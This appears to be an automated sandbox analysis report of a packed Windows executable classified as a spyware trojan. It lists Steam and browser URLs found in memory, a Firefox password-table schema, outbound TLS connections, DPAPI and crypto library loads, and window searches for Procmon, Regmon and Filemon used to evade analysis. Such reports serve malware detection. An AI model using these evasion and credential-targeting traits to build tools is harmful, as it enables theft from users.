                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001184000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001184000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowere
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688182205.00000000011A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.5.16.86:443 -> 192.168.2.5:49745 version: TLS 1.2

                System Summary

                barindex
                Source: TmmiCE5Ulm.exeStatic PE information: section name:
                Source: TmmiCE5Ulm.exeStatic PE information: section name: .rsrc
                Source: TmmiCE5Ulm.exeStatic PE information: section name: .idata
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_011A87880_3_011A8788
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112AB7E0_3_0112AB7E
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112AB7E0_3_0112AB7E
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 1924
                Source: TmmiCE5Ulm.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: TmmiCE5Ulm.exeStatic PE information: Section: ZLIB complexity 0.997431506849315
                Source: TmmiCE5Ulm.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@13/4
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5600
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\225c3a85-9a0a-401e-8fa4-34f6b7a66a76Jump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181566984.0000000005A93000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2157894493.0000000005A92000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2157090654.0000000005AAC000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2181566984.0000000005B25000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: TmmiCE5Ulm.exeReversingLabs: Detection: 57%
                Source: TmmiCE5Ulm.exeVirustotal: Detection: 69%
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeFile read: C:\Users\user\Desktop\TmmiCE5Ulm.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\TmmiCE5Ulm.exe "C:\Users\user\Desktop\TmmiCE5Ulm.exe"
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 1924
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: TmmiCE5Ulm.exeStatic file information: File size 2934784 > 1048576
                Source: TmmiCE5Ulm.exeStatic PE information: Raw size of wlptngjz is bigger than: 0x100000 < 0x2a4800

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeUnpacked PE file: 0.2.TmmiCE5Ulm.exe.6f0000.0.unpack :EW;.rsrc :W;.idata :W;wlptngjz:EW;nuxtdfjk:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wlptngjz:EW;nuxtdfjk:EW;.taggant:EW;
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: TmmiCE5Ulm.exeStatic PE information: real checksum: 0x2cd7fe should be: 0x2d7788
                Source: TmmiCE5Ulm.exeStatic PE information: section name:
                Source: TmmiCE5Ulm.exeStatic PE information: section name: .rsrc
                Source: TmmiCE5Ulm.exeStatic PE information: section name: .idata
                Source: TmmiCE5Ulm.exeStatic PE information: section name: wlptngjz
                Source: TmmiCE5Ulm.exeStatic PE information: section name: nuxtdfjk
                Source: TmmiCE5Ulm.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_011A9D05 push esi; retf 0_3_011A9D08
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_011AB336 pushad ; iretd 0_3_011AB36D
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_011A9887 push FFFFFFDBh; iretd 0_3_011A9898
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112C35E pushad ; ret 0_3_0112C361
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112C35E pushad ; ret 0_3_0112C361
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112CB7C push 78011A40h; retf 0_3_0112CB91
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112CB7C push 78011A40h; retf 0_3_0112CB91
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112C362 pushad ; ret 0_3_0112C365
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112C362 pushad ; ret 0_3_0112C365
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112C366 push 680112C3h; ret 0_3_0112C36D
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112C366 push 680112C3h; ret 0_3_0112C36D
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_01132FC1 push esi; iretd 0_3_01132FC2
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_01132FC1 push esi; iretd 0_3_01132FC2
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0118C350 push eax; ret 0_3_0118C351
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0118C350 push eax; ret 0_3_0118C351
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0118C354 push eax; ret 0_3_0118C355
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0118C354 push eax; ret 0_3_0118C355
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_01117077 push eax; iretd 0_3_011170A5
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0115ADB3 pushad ; ret 0_3_0115ADD1
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0115ADB3 pushad ; ret 0_3_0115ADD1
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0118C350 push eax; ret 0_3_0118C351
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0118C350 push eax; ret 0_3_0118C351
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0118C354 push eax; ret 0_3_0118C355
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0118C354 push eax; ret 0_3_0118C355
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112C35E pushad ; ret 0_3_0112C361
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112C35E pushad ; ret 0_3_0112C361
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112CB7C push 78011A40h; retf 0_3_0112CB91
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112CB7C push 78011A40h; retf 0_3_0112CB91
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112C362 pushad ; ret 0_3_0112C365
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112C362 pushad ; ret 0_3_0112C365
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeCode function: 0_3_0112C366 push 680112C3h; ret 0_3_0112C36D
                Source: TmmiCE5Ulm.exeStatic PE information: section name: entropy: 7.98239541875244

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
